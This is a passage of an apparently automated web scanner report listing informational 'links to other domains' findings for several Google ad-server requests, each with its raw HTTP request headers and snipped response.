</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RZieDDeGI_308736425.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUV8R0ZIMlV3cUxBSnwxMzAzNjYyNzM0OTIyfDF8MEZZWG9GdFhPUXwwUlppZUREZUdJfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDIwNTc3MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQjAANb_wK7GYTuv9w7qr-ELGqjb86HRtR-A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZZWG9GdFhPUQ&ciu=MFJaaWVERGVHSQ&reqid=NERCNDUwOEMwMDBENkZGQzBBRUM2NjEzQkFGRjcwRUU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=205&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.276. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680562&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662562177&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662562189&frm=1&adk=2614322350&ga_vid=496112147.1303662562&ga_sid=1303662562&ga_hid=148391433&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:29:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14747

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Dentertainmentmetals.com%26adT%3DEntertainment%2BMetals%2BInc.%26adU%3Dwww.sparco.com%26adT%3DComplete%2BIBM%2BSolutions%26gl%3DUS&amp;usg=AFQjCNFyahNJBXegzff51YuIo2PfaIJZDw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.277. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681884&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663884028&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303663884045&frm=1&adk=2614322350&ga_vid=631063773.1303663884&ga_sid=1303663884&ga_hid=1082704117&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=19 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:51:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.mollydarcyspub.com%26adT%3DCeltic%2BPub%2Bin%2BSt.%2BLouis%26adU%3Dwww.MrGrabBar.com/GrabBars%26adT%3DBuy%2Bshower%2Bsafety%2Bbars%26adU%3DWindsor.SonomaCounty.com/Wineries%26adT%3DWine%2BBar%2BWindsor%26gl%3DUS&amp;usg=AFQjCNEmSosxb-HttcTMGU_u7JdWtkWRuw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.278. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303680748&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html&dt=1303662755346&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303662755376&frm=0&adk=1607234649&ga_vid=707766038.1303662755&ga_sid=1303662755&ga_hid=1156798123&ga_fc=0&u_tz=-300&u_his=19&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&eid=33895130&fu=0&ifi=1&dtd=81&xpc=gY1PtJ7xAu&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:32:32 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13175

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.atomicorp.com%26adT%3DSecure%2BYour%2BServer%2BNow%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BDatabase%2BServer%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNH1HXun0mq4d2Lsz00t3Z_YPNecoA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.279. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303682070&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303664070114&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303664070139&frm=1&adk=2614322350&ga_vid=27459375.1303664070&ga_sid=1303664070&ga_hid=879563330&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=27 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:54:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.doubletake.visionsolutions.com%26adT%3DVirtualization%2BWhitepaper%26adU%3DInfocus.com/MSPRevenue%26adT%3DIncrease%2BMSP%2BRevenue%26adU%3Dtripplite.com/CoolingSolution%26adT%3DPortable%2BAC%2BUnit%26adU%3DMoreBarStools.com%26adT%3DTop%2BBar%2BStools%2BOn%2BSale%26gl%3DUS&amp;usg=AFQjCNGfYlSdSD2j7mWE_gVfLpXmIrHg8Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.280. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303671648&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Fsql-injection-database-user-admin-reflected-xss-dork-ghdb-www.hostingcatalog.com_80.htm&dt=1303657397970&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303657398684&frm=0&adk=1819763764&ga_vid=231596785.1303657400&ga_sid=1303657400&ga_hid=1374249996&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=2381&xpc=5aMmGrLJmq&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:03:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4346

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/sql-injection-database-user-admin-reflected-xss-dork-ghdb-www.hostingcatalog.com_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHq2WbKhOD27dkYJ7rAF4zbmT72Kg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.281. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676422&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658422760&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658422781&frm=1&adk=513358139&ga_vid=1252110327.1303658423&ga_sid=1303658423&ga_hid=224200758&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=27 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2288

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
xCZjBZgAGOkJqZCKgBprMHsAEB;redirect=http%3A%2F%2Fwww.regonline.com%2F__articles%2Fproducts%2Fonline%7Eregistration%7Eforms%3Futm_source%3Dquantcast%26utm_medium%3Ddisplay%26utm_campaign%3DQC_201104v2"><img src="http://content.quantserve.com/ads/regonline/Regonline_Q2-11.20110419.728x90.v2.gif" style="border-style: none"/></A><img src="http://exch.quantserve.com/pixel/p-b7FzQys84a9fI.gif?media=ad&p=TbQ_swAMKM4K5XcQIP9khIJU5UkpxOYpccD_Lg&r=466167206&rand=34463&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=0&rtbip=63.251.90.143&rtbdata2=EAAaD1JlZ29ubGluZV9RMi0xMSDQCyiEGTCJ3R46Mmh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfNzI4XzkwX2IucGhwQgcIr8YHEPUBSgcI_roGEOtYWih5VENfaE1reTU5WFFNTHVIeEdMemdNbGo2NERRYk91QW0yTWxCZjBZgAGOkJqZCKgBprMHsAEB" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

23.282. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676555&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658555980&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658555982&frm=1&adk=513358139&ga_vid=1291966576.1303658556&ga_sid=1303658556&ga_hid=793349281&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895130&fu=4&ifi=1&dtd=4 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_728_90_b.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:22:33 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4344

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_728_90_b.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3DConcur.com/Breeze_FreeTrial%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEehKvj399_s8FPWJC3KvcJsvFCUw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.283. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680047&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662047220&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662047231&frm=1&adk=2614322350&ga_vid=1889800734.1303662047&ga_sid=1303662047&ga_hid=184650008&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:20:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2161

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=rTkLkqau0QYxEN8cNaNZ1540fgUNTQEFI_-TsQris_yUrlPSSsigYRzdV-ftYQYrNyl8nUEbZUM81SBCKCjJVa9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ykFEGLiLwCfrF_l8MZMrUPZcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vFQ1hyEc2EaR6nmDIgRgRYe5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRN3AAEYgcK5QPQHd4Gc9VYh_kTRQqV9eMU3w&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBBkQK3E20TYfEEdCHlAfzjPjuAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0